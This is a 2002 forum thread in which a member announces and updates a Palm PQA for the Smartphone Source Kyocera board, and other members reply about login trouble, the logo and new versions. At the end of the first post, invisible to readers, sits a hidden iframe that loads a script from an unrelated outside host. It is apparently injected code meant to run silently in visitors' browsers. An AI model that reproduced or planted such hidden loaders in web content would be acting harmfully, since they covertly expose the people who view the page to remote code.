+ Reply to Thread
    Mod-Blog's SmartPhone Correspondent

New PQA for VBulletin

==========================
    WHAT IS THIS?

This PQA is the third in a VERY short line of PQAs for accessing the great Kyocera Smartphone site www.smartphonesource.com.
    With the recent (this is written 9/4/2002) move from PHPBB2 to VBulletin as the back end for the site, a new version was
    needed to fix all of the old (i.e. broken) links.

HOW DO I INSTALL/USE?

To install this PQA, simply unzip and double-click to add to your HotSync list.
    If you have a previous version of this PQA installed be aware THIS WILL NOT REPLACE IT. You will want to delete the old one.

This PQA gives you a simple and direct front-end to the site, but once you are into it you will NOT see a simplified view.
    The board is built with a server-side scripting language called PHP and I am unable to modify the code thru a simple PQA.
    I will contact the board maintainers to see if a simplified mobile form can be created as a VBulletin style.

I do not believe you can log into the board as yourself with this PQA at this stage - it requires cookies which PQAs do not
    support (at least in their normal form).

This PQA is offered with NO PROMISES AS TO ITS ABILITIES. Use at your own risk... though I have made sure the links are
    not broken and that it does not do any damage to my PQA.

WHAT IS NEW?
    As of September 4, 2002
    1. Updated links to match new VBulletin URLs
    2. Rearranged links to match the new arrangement on the board
    3. Added Smartphone Source graphic to initial display

WHO MADE THIS?
    Nomad7674 on the Smartphone Source Board. Would rather remain anonymous for now. If you have any ideas/complaints/etc.,
    please contact me via a PM on the board. I check fairly regularly.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files

Updated to include Login

I realize it is not "normal" to release a new version the day after release of the previous version, but I made a discovery last night and the PQA now includes the ability to log into the board!

(I am working on how to save the info for autologin or at least autofill of your username password)

I also revised the layout to allow for less scrolling (important for a PQA).

Please let me know how you like the PQA so far and what I could do to improve it. This version of the ZIP file includes the "source code" of what I did.
    Attached Files

Oh When that Shark Bites! LBOCEAN's Avatar
    You just keep crank'n away there Nomad. Development of such a much wanted PQA, updates are no problem.

Well said brother lbocean. Thanks nomad7674!

Sounds sweet, thanks nomad! Now if only I could get this problem fixed where I haven't been able to sync with my work computer in a few days... who knows why, but I haven't had time to mess with it (can't you tell I spend my entire work day with my nose to the grindstone? haha).

Anybody used it yet? Is it easy to reply to a thread or create a new one? I'll be interested to test it side by side with Xiino to compare speed (I have the main discussion page cached in and "locked", with me already logged in... so all I have to do is refresh).
    Please visit my picture site: Robert-O-Rama :)

It works well, at least for reading. I attempted to post to a thread, but vbulletin thought I wasn't logged in. So, I was at the screen to login, but the login submit button doesn't show up. So, I don't think it's currently possible to post yet.

It could be the limitation that web clipping doesn't support cookies, but I don't know if vbulletin depends on cookies to know whether you're currently logged in or not.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

PQA Comments

As for posting to the forum, I have had mixed results. Sometimes it has worked fine, sometimes I also have gotten stuck in the endless loop of "submit-login-submit-login-etc." I am researching now and will see what I can do about it.

Something I am curious about for those who have downloaded both the first PQA from this thread and the second: Do you prefer the compact view (from the second one), or the one which more closely mirrors how the original board looks (from the first)?

Thanks. Also am engaged in research on seeing about having a more lightweight view a la Treocental's mobile view. Should be interesting!

Personally, that later one V5 I think you referred to in the About Info. It would be the 3rd download.

Cool Dolphin Robert. I grabbed a copy for alittle project i'm working on.

Originally posted by lbocean
    Cool Dolphin Robert. I grabbed a copy for alittle project i'm working on.
    Thanks lbocean!

Updated PQA

A small update to the SmartPhone Source PQA. Two main changes:
    1. Added PalmOS forum to the PQA
    2. Updated the icon to look a little less cheesy (though not much - I am no artist)

Hope this is useful/helpful to some of you.

(Also, a reminder that the ZIP now contains the source I am using, in case anyone else wants to get creative. This includes the BMP file which is the icon - if anyone wants to make a better one, feel free!)
    Attached Files

Thanks for the updated version nomad! I'm looking forward to giving it a spin

PQA Logo

Hey Nomi;

I made the existing logo alittle crisper:

Current:

Newer:

Here's a copy to download:
    (It's in .gif - let me know if you need a different file format)
    Attached Files

Re: PQA Logo

Originally posted by lbocean I made the existing logo alittle crisper...
    Thanks, LBOcean. Not sure it comes out any clearer on the 6035, but it may on the 7135!

Here is a new PQA with LBOcean's new logo and several other small behind-the-scenes enhancements.
    Attached Files

Whew! Jazz and JimmyJoe are exhausting me with all of these enhancements to the board! Here is a new PQA with access to the new Front Page and to the new forums. Enjoy.

Now time for nap. :sleep:
    Attached Files